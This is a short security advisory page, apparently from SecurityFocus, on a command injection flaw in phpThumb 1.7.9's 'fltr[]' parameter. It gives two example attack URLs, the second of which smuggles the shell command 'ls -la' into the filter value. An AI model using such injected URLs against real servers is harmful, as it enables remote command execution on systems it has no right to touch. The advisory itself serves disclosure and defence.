phpThumb() 'fltr[]' Parameter Command Injection Vulnerability

Attackers can exploit this issue via a browser. Reports indicate that this issue is being exploited in the wild.

The following example URIs are available:

http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=Z:/home/example.com/www/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "Z:/home/example.com/www/kartinka.jpg" jpeg:"Z:/home/example.com

http://www.example.com/phpThumb_1.7.9/phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9


 

Privacy Statement
Copyright 2010, SecurityFocus